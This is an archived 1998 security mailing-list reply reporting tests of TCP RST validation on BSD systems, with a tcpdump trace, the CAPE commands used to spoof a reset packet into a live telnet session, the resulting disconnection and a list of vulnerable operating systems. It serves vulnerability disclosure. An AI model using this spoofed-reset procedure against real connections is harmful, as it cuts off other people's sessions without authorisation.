Re: FreeBSD's RST validation

From: Oliver Friedrichs (oliverat_private)
Date: Mon Aug 31 1998 - 12:36:35 PDT

Next message: Andrew Finkenstadt: "Re: Hole in Oracle Server/Developer 2000 - authentication"

Previous message: Andy Church: "Re: Security Hole in Axent ESM"
Maybe in reply to: Tristan Horn: "FreeBSD's RST validation"
Next in thread: Jason Thorpe: "Re: FreeBSD's RST validation"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Darren Reed brought this up in June, 1997, on the NetBSD security list,
after which I performed some tests.  I ended up with a number of
questions after doing this, but never followed up to determine what was
going on.

Anyways, here's my old message

- Oliver
  Network Associates, Inc.

------

Ok, here's how my tests turned out:

I have 3 systems involved:

199.185.231.20 - OpenBSD system
199.185.231.24 - FreeBSD system
199.185.231.25 - BSDI system

I'm telneted from BSDI to FreeBSD, and monitoring and spoofing from
the OpenBSD system using tcpdump and CAPE.

20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 <nop,nop,timestamp 750118 2277749> [tos 0x10]
20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 1:55(54) ack 1 win 17376 <nop,nop,timestamp 2278005 750118> (DF) [tos 0x10]

So I'm logged into FreeBSD from port 3349 on the BSDI system.  On OpenBSD..

bash# ./cape -i
Welcome to CAPE.  "help" for general help, "help topic" for help on topic

Active network interfaces:
   - Interface: lo0 Address: 127.0.0.1
   - Interface: ed2 Address: 199.185.231.20

cape> iface=ed2
cape> gateway=199.185.231.24
cape> ip
cape> ip_src=199.185.231.23
cape> ip_dst=199.185.231.24
cape> ip_proto=IPPROTO_TCP
cape> tcp
cape> tcp_sport=3349
cape> tcp_dport=23
cape> tcp_flags=RST
cape> send
Processing: Packet transmitted

Here's my spoofed packet with random seq/ack numbers:

20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096

As soon as I hit a key on the FreeBSD system...

[20:25:01] [freebsd]
[/usr/local/scanner] % Connection closed by foreign host.

Poof, it works, repeatable every time.  This works when spoofing the
packet from the BSDI system TO the FreeBSD system.  For some reason
(which I've been unable to figure out yet, I cannot spoof packets
from the FreeBSD system to the BSDI system and have this work).
This works between OpenBSD and FreeBSD however (both ways).
This doesn't work against Solaris.

Here's what I found with the systems here:

OpenBSD 2.1 - vulnerable
FreeBSD 2.1.x - vulnerable
BSDI        - appears not vulnerable (?)
Solaris 2.5 - appears not vulnerable
IRIX    6.2 - appears not vulnerable
Linux       - appears not vulnerable
Windows NT  - appears not vulnerable

Next message: Andrew Finkenstadt: "Re: Hole in Oracle Server/Developer 2000 - authentication"
Previous message: Andy Church: "Re: Security Hole in Axent ESM"
Maybe in reply to: Tristan Horn: "FreeBSD's RST validation"
Next in thread: Jason Thorpe: "Re: FreeBSD's RST validation"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:14:31 PDT